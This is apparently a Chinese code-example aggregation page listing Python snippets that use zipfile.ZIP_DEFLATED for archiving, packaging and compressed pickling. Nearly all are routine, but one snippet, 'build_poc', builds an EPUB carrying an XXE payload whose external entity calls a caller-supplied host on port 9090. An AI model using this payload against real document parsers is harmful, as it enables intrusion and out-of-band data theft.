Python zipfile 模块,ZIP_DEFLATED 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用zipfile.ZIP_DEFLATED

项目:AutoML5    作者:djajetic    | 项目源码 | 文件源码
def zipdir(archivename, basedir):
    '''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            #NOTE: ignore empty directories
            for fn in files:
                if fn[-4:]!='.zip':
                    absfn = os.path.join(root, fn)
                    zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
                    z.write(absfn, zfn)

# ================ Inventory input data and create data structure =================
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Unpickle a possible compressed pickle.

    Parameters
    ----------
    path: str
        path to the output file
    compression: bool
        if true assumes that pickle was compressed when created and attempts decompression.

    Returns
    -------
    obj: object
        the unpickled object
    """

    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
            with myzip.open("data") as f:
                return pickle.load(f)
    else:
        with open(path, "rb") as f:
            return pickle.load(f)
项目:gimel    作者:Alephbet    | 项目源码 | 文件源码
def prepare_zip():
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
        info = ZipInfo('config.json')
        info.external_attr = 0o664 << 16
        zipf.writestr(info, dumps(config))
        zipf.write(resource('gimel', 'config.py'), 'config.py')
        zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
        zipf.write(resource('gimel', 'logger.py'), 'logger.py')
        for root, dirs, files in os.walk(resource('gimel', 'vendor')):
            for file in files:
                real_file = os.path.join(root, file)
                relative_file = os.path.relpath(real_file,
                                                resource('gimel', ''))
                zipf.write(real_file, relative_file)
项目:pyseeder    作者:PurpleI2P    | 项目源码 | 文件源码
def reseed(self, netdb):
        """Compress netdb entries and set content"""
        zip_file = io.BytesIO()
        dat_files = []

        for root, dirs, files in os.walk(netdb):
            for f in files:
                if f.endswith(".dat"):
                    # TODO check modified time
                    # may be not older than 10h
                    dat_files.append(os.path.join(root, f))

        if len(dat_files) == 0:
            raise PyseederException("Can't get enough netDb entries")
        elif len(dat_files) > 75:
            dat_files = random.sample(dat_files, 75)

        with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
            for f in dat_files: 
                zf.write(f, arcname=os.path.split(f)[1])

        self.FILE_TYPE = 0x00
        self.CONTENT_TYPE = 0x03
        self.CONTENT = zip_file.getvalue()
        self.CONTENT_LENGTH = len(self.CONTENT)
项目:albt    作者:geothird    | 项目源码 | 文件源码
def __zip_function__(self):
        """
        Zip source code
        :return:
        """
        PrintMsg.cmd('{}'.format(
            os.path.join(self.path, self.zip_name)), 'ARCHIVING')
        zipf = zipfile.ZipFile(
            os.path.join(self.path, self.zip_name), 'w', zipfile.ZIP_DEFLATED)
        if self.virtual_env:
            env_path = self.virtual_env
            for root, dirs, files in os.walk(self.virtual_env):
                for d in dirs:
                    if d == 'site-packages':
                        env_path = os.path.join(root, d)
            Lambda.zip_add_dir(env_path, zipf)
        if len(self.libraries) > 0:
            for lib in self.libraries:
                Lambda.zip_add_dir(lib, zipf, True)
        zipf.write(os.path.join(self.path, self.function), self.function)
        zipf.close()
项目:geekcloud    作者:Mr-Linus    | 项目源码 | 文件源码
def load_full_log(self, filename, user=None, uid=None):
        if isinstance(user, User):
            user = user
        elif uid:
            user = User.objects.get(id=uid)
        else:
            user = self.user
        if user:
            if self._lists:
                self.file = self._lists.get(filename=filename)
            else:
                self.file = TermLog.objects.get(filename=filename)
            if self.file.logPath == 'locale':
                return self.file.log
            else:
                try:
                    zf = zipfile.ZipFile(self.file.logPath, 'r', zipfile.ZIP_DEFLATED)
                    zf.setpassword(self.file.logPWD)
                    self._data = zf.read(zf.namelist()[0])
                    return self._data
                except KeyError:
                    return 'ERROR: Did not find %s file' % filename
        return 'ERROR User(None)'
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def ZipFiles(targetdir, ziparchivename):
    '''Create a zip archive of all files in the target directory.
    '''
    #os.chdir(targetdir)
    myzip = zipfile.ZipFile(ziparchivename, "w", zipfile.ZIP_DEFLATED)

    if type(targetdir) == str:
        for root, dirs, files in os.walk(targetdir):
            for fname in files:
                if fname != ziparchivename:
                    myzip.write(os.path.join(root,fname))
    if type(targetdir) == list:
        for fname in targetdir:
            myzip.write(fname)

    myzip.close()
    myzip = zipfile.ZipFile(ziparchivename, "r", zipfile.ZIP_DEFLATED)
    if myzip.testzip() != None:
        print "Warning: Zipfile did not pass check."
    myzip.close()
项目:zoocore    作者:dsparrow27    | 项目源码 | 文件源码
def createZipWithProgress(zippath, files):
    """Same as function createZip() but has a stdout progress bar which is useful for commandline work
    :param zippath: the file path for the zip file
    :type zippath: str
    :param files: A Sequence of file paths that will be archived.
    :type files: seq(str)
    """
    dir = os.path.dirname(zippath)
    if not os.path.exists(os.path.join(dir, os.path.dirname(zippath))):
        os.makedirs(os.path.join(dir, os.path.dirname(zippath)))
    logger.debug("writing file: {}".format(zippath))
    length = len(files)
    progressBar = commandline.CommandProgressBar(length, prefix='Progress:', suffix='Complete', barLength=50)
    progressBar.start()
    with zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED) as archive:
        for p in iter(files):
            logger.debug("Archiving file: {} ----> :{}\n".format(p[0], p[1]))
            archive.write(p[0], p[1])
            progressBar.increment(1)
    logger.debug("finished writing zip file to : {}".format(zippath))
项目:abusehelper    作者:Exploit-install    | 项目源码 | 文件源码
def format(self, parts, events, filename, *args):
        prefix, ext = os.path.splitext(filename)
        if ext.lower() == ".zip":
            zip_name = filename
            raw_name = prefix
        else:
            zip_name = filename + ".zip"
            raw_name = filename

        data = self.formatter.format(parts, events, *args)
        memfile = StringIO()
        zipped = zipfile.ZipFile(memfile, 'w', zipfile.ZIP_DEFLATED)
        zipped.writestr(raw_name, data.encode("utf-8"))
        zipped.close()
        memfile.flush()
        memfile.seek(0)

        part = MIMEBase("application", "zip")
        part.set_payload(memfile.read())
        encode_base64(part)
        part.add_header("Content-Disposition", "attachment", filename=zip_name)
        parts.append(part)

        return u""
项目:hostapd-mana    作者:adde88    | 项目源码 | 文件源码
def makeZipFiles(self):
        self._makebigfile('bigfile.zip', zipfile.ZIP_STORED)

        zf2=zipfile.ZipFile('littlefiles.zip', 'w')
        try:
            os.mkdir('zipstreamdir')
        except EnvironmentError:
            pass
        for i in range(1000):
            fn='zipstreamdir/%d' % i
            stuff(fn, '')
            zf2.write(fn)
        zf2.close()

        self._makebigfile('bigfile_deflated.zip', zipfile.ZIP_DEFLATED)        

        self.cleanupUnzippedJunk()
项目:scar    作者:grycap    | 项目源码 | 文件源码
def create_zip_file(self, file_name, args):
        # Set generic lambda function name
        function_name = file_name + '.py'
        # Copy file to avoid messing with the repo files
        # We have to rename because the function name afects the handler name
        shutil.copy(Config.dir_path + '/lambda/scarsupervisor.py', function_name)
        # Zip the function file
        with zipfile.ZipFile(Config.zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zf:
            # Lambda function code
            zf.write(function_name)
            # Udocker script code
            zf.write(Config.dir_path + '/lambda/udocker', 'udocker')
            # Udocker libs
            zf.write(Config.dir_path + '/lambda/udocker-1.1.0-RC2.tar.gz', 'udocker-1.1.0-RC2.tar.gz')
            os.remove(function_name)
            if hasattr(args, 'script') and args.script:
                zf.write(args.script, 'init_script.sh')
                Config.lambda_env_variables['Variables']['INIT_SCRIPT_PATH'] = "/var/task/init_script.sh"
        if hasattr(args, 'extra_payload') and args.extra_payload:
            self.zipfolder(Config.zip_file_path, args.extra_payload)
            Config.lambda_env_variables['Variables']['EXTRA_PAYLOAD'] = "/var/task/extra/"
        # Return the zip as an array of bytes
        with open(Config.zip_file_path, 'rb') as f:
            return f.read()
项目:script.skin.helper.skinbackup    作者:marcelveldt    | 项目源码 | 文件源码
def backup_theme(self, themename):
        '''backup a colortheme to a zipfile'''
        import zipfile
        backup_path = xbmcgui.Dialog().browse(3, self.addon.getLocalizedString(32029), "files").decode("utf-8")
        if backup_path:
            xbmc.executebuiltin("ActivateWindow(busydialog)")
            backup_name = u"%s ColorTheme - %s" % (get_skin_name().capitalize(), themename)
            backupfile = os.path.join(backup_path, backup_name + u".zip")
            zip_temp = u'special://temp/%s.zip' % backup_name
            xbmcvfs.delete(zip_temp)
            xbmcvfs.delete(backupfile)
            zip_temp = xbmc.translatePath(zip_temp).decode("utf-8")
            zip_file = zipfile.ZipFile(zip_temp, "w", zipfile.ZIP_DEFLATED)
            abs_src = os.path.abspath(xbmc.translatePath(self.userthemes_path).decode("utf-8"))
            for filename in xbmcvfs.listdir(self.userthemes_path)[1]:
                if (filename.startswith("%s_" % themename) or
                        filename.replace(".theme", "").replace(".jpg", "") == themename):
                    filename = filename.decode("utf-8")
                    filepath = xbmc.translatePath(self.userthemes_path + filename).decode("utf-8")
                    absname = os.path.abspath(filepath)
                    arcname = absname[len(abs_src) + 1:]
                    zip_file.write(absname, arcname)
            zip_file.close()
            xbmcvfs.copy(zip_temp, backupfile)
            xbmc.executebuiltin("Dialog.Close(busydialog)")
项目:combine-DT-with-NN-in-RL    作者:Burning-Bear    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Unpickle a possible compressed pickle.

    Parameters
    ----------
    path: str
        path to the output file
    compression: bool
        if true assumes that pickle was compressed when created and attempts decompression.

    Returns
    -------
    obj: object
        the unpickled object
    """

    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
            with myzip.open("data") as f:
                return pickle.load(f)
    else:
        with open(path, "rb") as f:
            return pickle.load(f)
项目:tecken    作者:mozilla-services    | 项目源码 | 文件源码
def run():
    urls = [
        x.strip()
        for x in URLS.strip().splitlines()
        if x.strip() and not x.strip().startswith('#')
    ]

    with tempfile.TemporaryDirectory(prefix='symbols') as tmpdirname:
        downloaded = download_all(urls, tmpdirname)
        save_filepath = 'symbols-for-systemtests.zip'
        total_time_took = 0.0
        total_size = 0
        with zipfile.ZipFile(save_filepath, mode='w') as zf:
            for uri, (fullpath, time_took, size) in downloaded.items():
                total_time_took += time_took
                total_size += size
                if fullpath:
                    path = uri.replace('v1/', '')
                    assert os.path.isfile(fullpath)
                    zf.write(
                        fullpath,
                        arcname=path,
                        compress_type=zipfile.ZIP_DEFLATED,
                    )
项目:devsecops-example-helloworld    作者:boozallen    | 项目源码 | 文件源码
def _upload(self, filename):
        fp = IOStream()
        zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED)
        zipped.write(filename, os.path.split(filename)[1])
        zipped.close()
        content = base64.encodestring(fp.getvalue())
        if not isinstance(content, str):
            content = content.decode('utf-8')
        try:
            return self._execute(Command.UPLOAD_FILE,
                            {'file': content})['value']
        except WebDriverException as e:
            if "Unrecognized command: POST" in e.__str__():
                return filename
            elif "Command not found: POST " in e.__str__():
                return filename
            elif '{"status":405,"value":["GET","HEAD","DELETE"]}' in e.__str__():
                return filename
            else:
                raise e
项目:wikilinks    作者:trovdimi    | 项目源码 | 文件源码
def plaintext2zip(self, file_name, subdirname, plaintext):

        file_name=file_name.split('.')[0]
        plaintext_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.txt'
        zip_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.zip'

        if not os.path.exists(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname):
            os.makedirs(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname)


        with codecs.open(plaintext_file_name, 'w', encoding='utf8') as outfile:
            outfile.write(plaintext)
            outfile.flush()
            outfile.close()

        zf = zipfile.ZipFile(zip_file_name, mode='w', compression=zipfile.ZIP_DEFLATED)
        try:
            zf.write(plaintext_file_name, os.path.basename(plaintext_file_name))
            os.remove(plaintext_file_name)
        except Exception, e:
            print e
            logging.error('zip error %s ' % plaintext_file_name)
        finally:
            zf.close()
项目:KodiDevKit    作者:phil65    | 项目源码 | 文件源码
def make_archive(folderpath, archive):
    """
    Create zip with path *archive from folder with path *folderpath
    """
    file_list = get_absolute_file_paths(folderpath)
    with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as zip_file:
        for addon_file in file_list:
            path_list = re.split(r'[\\/]', addon_file)
            rel_path = os.path.relpath(addon_file, folderpath)
            if ".git" in path_list:
                continue
            if rel_path.startswith("media") and not rel_path.endswith(".xbt"):
                continue
            if rel_path.startswith("themes"):
                continue
            if addon_file.endswith(('.pyc', '.pyo', '.zip')):
                continue
            if addon_file.startswith(('.')):
                continue
            zip_file.write(addon_file, rel_path)
            logging.warning("zipped %s" % rel_path)
项目:OSPTF    作者:xSploited    | 项目源码 | 文件源码
def updateZip(zipname, filename, data):
    # generate a temp file
    tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))
    os.close(tmpfd)

    # create a temp copy of the archive without filename
    with zipfile.ZipFile(zipname, 'r') as zin:
        with zipfile.ZipFile(tmpname, 'w') as zout:
            zout.comment = zin.comment # preserve the comment
            for item in zin.infolist():
                if item.filename != filename:
                    zout.writestr(item, zin.read(item.filename))

    # replace with the temp archive
    os.remove(zipname)
    os.rename(tmpname, zipname)

    # now add filename with its new data
    with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, data)
项目:rl-attack-detection    作者:yenchenlin    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Unpickle a possible compressed pickle.

    Parameters
    ----------
    path: str
        path to the output file
    compression: bool
        if true assumes that pickle was compressed when created and attempts decompression.

    Returns
    -------
    obj: object
        the unpickled object
    """

    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
            with myzip.open("data") as f:
                return pickle.load(f)
    else:
        with open(path, "rb") as f:
            return pickle.load(f)
项目:nojs    作者:chrisdickinson    | 项目源码 | 文件源码
def _ArchiveOutputDir(self):
    """Archive all files in the output dir, and return as compressed bytes."""
    with io.BytesIO() as archive:
      with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as contents:
        num_files = 0
        for absdir, _, files in os.walk(self._output_dir):
          reldir = os.path.relpath(absdir, self._output_dir)
          for filename in files:
            src_path = os.path.join(absdir, filename)
            # We use normpath to turn './file.txt' into just 'file.txt'.
            dst_path = os.path.normpath(os.path.join(reldir, filename))
            contents.write(src_path, dst_path)
            num_files += 1
      if num_files:
        logging.info('%d files in the output dir were archived.', num_files)
      else:
        logging.warning('No files in the output dir. Archive is empty.')
      return archive.getvalue()
项目:gprime    作者:GenealogyCollective    | 项目源码 | 文件源码
def _write_zip(self):
        try:
            file = zipfile.ZipFile(self.filename,"w",zipfile.ZIP_DEFLATED)
        except IOError as msg:
            errmsg = "%s\n%s" % (_("Could not create %s") % self.filename, msg)
            raise ReportError(errmsg)
        except:
            raise ReportError(_("Could not create %s") % self.filename)

        file.write(self.manifest_xml,str("META-INF/manifest.xml"))
        file.write(self.content_xml,str("content.xml"))
        file.write(self.meta_xml,str("meta.xml"))
        file.write(self.styles_xml,str("styles.xml"))
        file.write(self.mimetype,str("mimetype"))
        file.close()

        os.unlink(self.manifest_xml)
        os.unlink(self.content_xml)
        os.unlink(self.meta_xml)
        os.unlink(self.styles_xml)
项目:baselines    作者:openai    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Unpickle a possible compressed pickle.

    Parameters
    ----------
    path: str
        path to the output file
    compression: bool
        if true assumes that pickle was compressed when created and attempts decompression.

    Returns
    -------
    obj: object
        the unpickled object
    """

    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
            with myzip.open("data") as f:
                return pickle.load(f)
    else:
        with open(path, "rb") as f:
            return pickle.load(f)
项目:auditwheel    作者:pypa    | 项目源码 | 文件源码
def dir2zip(in_dir, zip_fname):
    """ Make a zip file `zip_fname` with contents of directory `in_dir`

    The recorded filenames are relative to `in_dir`, so doing a standard zip
    unpack of the resulting `zip_fname` in an empty directory will result in
    the original directory contents.

    Parameters
    ----------
    in_dir : str
        Directory path containing files to go in the zip archive
    zip_fname : str
        Filename of zip archive to write
    """
    z = zipfile.ZipFile(zip_fname, 'w', compression=zipfile.ZIP_DEFLATED)
    for root, dirs, files in os.walk(in_dir):
        for file in files:
            fname = os.path.join(root, file)
            out_fname = os.path.relpath(fname, in_dir)
            z.write(os.path.join(root, file), out_fname)
    z.close()
项目:aws-cfn-plex    作者:lordmuffin    | 项目源码 | 文件源码
def assemble_my_parts(self):
        """Assemble the `self.parts` dictionary.  Extend in subclasses.
        """
        writers.Writer.assemble_parts(self)
        f = tempfile.NamedTemporaryFile()
        zfile = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
        self.write_zip_str(zfile, 'mimetype', self.MIME_TYPE,
            compress_type=zipfile.ZIP_STORED)
        content = self.visitor.content_astext()
        self.write_zip_str(zfile, 'content.xml', content)
        s1 = self.create_manifest()
        self.write_zip_str(zfile, 'META-INF/manifest.xml', s1)
        s1 = self.create_meta()
        self.write_zip_str(zfile, 'meta.xml', s1)
        s1 = self.get_stylesheet()
        self.write_zip_str(zfile, 'styles.xml', s1)
        self.store_embedded_files(zfile)
        self.copy_from_stylesheet(zfile)
        zfile.close()
        f.seek(0)
        whole = f.read()
        f.close()
        self.parts['whole'] = whole
        self.parts['encoding'] = self.document.settings.output_encoding
        self.parts['version'] = docutils.__version__
项目:poc    作者:sourceincite    | 项目源码 | 文件源码
def build_poc(server):
    xxe = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
    <rootfiles>
        <rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile>
    </rootfiles>
</container>""" % server

    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    zipinfo = zipfile.ZipInfo("META-INF/container.xml")
    zipinfo.external_attr = 0777 << 16L
    z.writestr(zipinfo, xxe)
    z.close()
    epub = open('poc.epub','wb')
    epub.write(f.getvalue())
    epub.close()
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
项目:ardy    作者:avara1986    | 项目源码 | 文件源码
def create_zip(cls, fname):
        example_file = fname + ".txt"
        zip_file = fname + ".zip"
        touch(example_file)
        zfh = zipfile.ZipFile(fname + ".zip", 'w', zipfile.ZIP_DEFLATED)
        zfh.write(example_file)
        zfh.close()
        os.remove(example_file)
        return zip_file
项目:stalker_pyramid    作者:eoyilmaz    | 项目源码 | 文件源码
def archive(cls, path):
        """Creates a zip file containing the given directory.

        :param path: Path to the archived directory.
        :return:
        """
        import zipfile
        dir_name = os.path.basename(path)
        zip_path = os.path.join(tempfile.gettempdir(), '%s.zip' % dir_name)

        parent_path = os.path.dirname(path) + '/'

        z = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED,
                            allowZip64=True)
        try:
            for current_dir_path, dir_names, file_names in os.walk(path):
                for dir_name in dir_names:
                    dir_path = os.path.join(current_dir_path, dir_name)
                    arch_path = dir_path[len(parent_path):]
                    z.write(dir_path, arch_path)

                for file_name in file_names:
                    file_path = os.path.join(current_dir_path, file_name)
                    arch_path = file_path[len(parent_path):]
                    z.write(file_path, arch_path)
        finally:
            z.close()

        return zip_path
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in sorted_walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in sorted_walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
项目:python-libjuju    作者:juju    | 项目源码 | 文件源码
def make_archive(self, path):
        """Create archive of directory and write to ``path``.

        :param path: Path to archive

        Ignored::

            * build/\* - This is used for packing the charm itself and any
                          similar tasks.
            * \*/.\*    - Hidden files are all ignored for now.  This will most
                          likely be changed into a specific ignore list
                          (.bzr, etc)

        """
        zf = zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED)
        for dirpath, dirnames, filenames in os.walk(self.path):
            relative_path = dirpath[len(self.path) + 1:]
            if relative_path and not self._ignore(relative_path):
                zf.write(dirpath, relative_path)
            for name in filenames:
                archive_name = os.path.join(relative_path, name)
                if not self._ignore(archive_name):
                    real_path = os.path.join(dirpath, name)
                    self._check_type(real_path)
                    if os.path.islink(real_path):
                        self._check_link(real_path)
                        self._write_symlink(
                            zf, os.readlink(real_path), archive_name)
                    else:
                        zf.write(real_path, archive_name)
        zf.close()
        return path
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def load(path, num_cpu=16):
        with open(path, "rb") as f:
            model_data, act_params = dill.load(f)
        act = deepq.build_act(**act_params)
        sess = U.make_session(num_cpu=num_cpu)
        sess.__enter__()
        with tempfile.TemporaryDirectory() as td:
            arc_path = os.path.join(td, "packed.zip")
            with open(arc_path, "wb") as f:
                f.write(model_data)

            zipfile.ZipFile(arc_path, 'r', zipfile.ZIP_DEFLATED).extractall(td)
            U.load_state(os.path.join(td, "model"))

        return ActWrapper(act, act_params)
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def relatively_safe_pickle_dump(obj, path, compression=False):
    """This is just like regular pickle dump, except from the fact that failure cases are
    different:

        - It's never possible that we end up with a pickle in corrupted state.
        - If a there was a different file at the path, that file will remain unchanged in the
          even of failure (provided that filesystem rename is atomic).
        - it is sometimes possible that we end up with useless temp file which needs to be
          deleted manually (it will be removed automatically on the next function call)

    The indended use case is periodic checkpoints of experiment state, such that we never
    corrupt previous checkpoints if the current one fails.

    Parameters
    ----------
    obj: object
        object to pickle
    path: str
        path to the output file
    compression: bool
        if true pickle will be compressed
    """
    temp_storage = path + ".relatively_safe"
    if compression:
        # Using gzip here would be simpler, but the size is limited to 2GB
        with tempfile.NamedTemporaryFile() as uncompressed_file:
            pickle.dump(obj, uncompressed_file)
            with zipfile.ZipFile(temp_storage, "w", compression=zipfile.ZIP_DEFLATED) as myzip:
                myzip.write(uncompressed_file.name, "data")
    else:
        with open(temp_storage, "wb") as f:
            pickle.dump(obj, f)
    os.rename(temp_storage, path)
项目:BackManager    作者:linuxyan    | 项目源码 | 文件源码
def backup_mysql():
    try:
        back_file_name = database_name+time.strftime("%Y%m%d_%H%M%S", time.localtime())
        back_file_path = os.path.join(backup_dir,back_file_name)
        backup_command= '%s -h%s -P%d -u%s  -p%s --default-character-set=utf8 %s  > %s'\
                        %(mysql_dump,mysql_host,int(mysql_port),mysql_user,mysql_pass,database_name,back_file_path)
        if os.system(backup_command) == 0:
            zip_file_path = back_file_path+'.zip'
            f = zipfile.ZipFile(zip_file_path, 'w' ,zipfile.ZIP_DEFLATED,allowZip64=True)
            f.write(back_file_path,back_file_name)
            f.close()
            md5_num = str(md5sum(zip_file_path))
            md5_file_path = zip_file_path+'_'+md5_num
            back_file_new_path = os.path.join(backup_dir,md5_file_path)
            os.rename(zip_file_path,back_file_new_path)
            os.remove(back_file_path)
            data = {'status':'back_success','file_path':back_file_new_path,'md5':md5_num}
            return data
        else:
            data = {'status':'back_failed'}
            return data
    except Exception, e:
        print e
        data = {'status':'back_failed'}
        return data
项目:aws-greengrass-mini-fulfillment    作者:awslabs    | 项目源码 | 文件源码
def refresh_lambda_zip(lambda_files, lambda_dir):
    with zipfile.ZipFile(temp_deploy_zip, "w", zipfile.ZIP_DEFLATED) as zf:
        for f in lambda_files:
            zf.write(lambda_dir + '/' + f, basename(f))
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def archive(self, build_dir):
        assert self.source_dir
        create_archive = True
        archive_name = '%s-%s.zip' % (self.name, self.installed_version)
        archive_path = os.path.join(build_dir, archive_name)
        if os.path.exists(archive_path):
            response = ask_path_exists(
                'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
                display_path(archive_path), ('i', 'w', 'b'))
            if response == 'i':
                create_archive = False
            elif response == 'w':
                logger.warn('Deleting %s' % display_path(archive_path))
                os.remove(archive_path)
            elif response == 'b':
                dest_file = backup_dir(archive_path)
                logger.warn('Backing up %s to %s'
                            % (display_path(archive_path), display_path(dest_file)))
                shutil.move(archive_path, dest_file)
        if create_archive:
            zip = zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED)
            dir = os.path.normcase(os.path.abspath(self.source_dir))
            for dirpath, dirnames, filenames in os.walk(dir):
                if 'pip-egg-info' in dirnames:
                    dirnames.remove('pip-egg-info')
                for dirname in dirnames:
                    dirname = os.path.join(dirpath, dirname)
                    name = self._clean_zip_name(dirname, dir)
                    zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
                    zipdir.external_attr = 0x1ED << 16 # 0o755
                    zip.writestr(zipdir, '')
                for filename in filenames:
                    if filename == PIP_DELETE_MARKER_FILENAME:
                        continue
                    filename = os.path.join(dirpath, filename)
                    name = self._clean_zip_name(filename, dir)
                    zip.write(filename, self.name + '/' + name)
            zip.close()
            logger.indent -= 2
            logger.notify('Saved %s' % display_path(archive_path))
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=None,
    mode='w'
):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile
    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir)+1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'" % p)

    if compress is None:
        compress = (sys.version>="2.4") # avoid 2.3 zipimport bug when 64 bits

    compression = [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED][bool(compress)]
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
#
项目:pip-update-requirements    作者:alanhamlett    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def GetZipWith(fname, content):
    fp = StringIO.StringIO()
    zf = zipfile.ZipFile(fp, "a", zipfile.ZIP_DEFLATED, False)
    zf.writestr(fname, content)
    zf.close()
    return fp.getvalue()
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def save_files_in_zip():
    """saves created files in zip file"""
    if not CREATED_FILES:
        output_line('-- nothing to zip')
    else:
        zip_name = os.path.join(SCHEMA_DIR + '.zip')
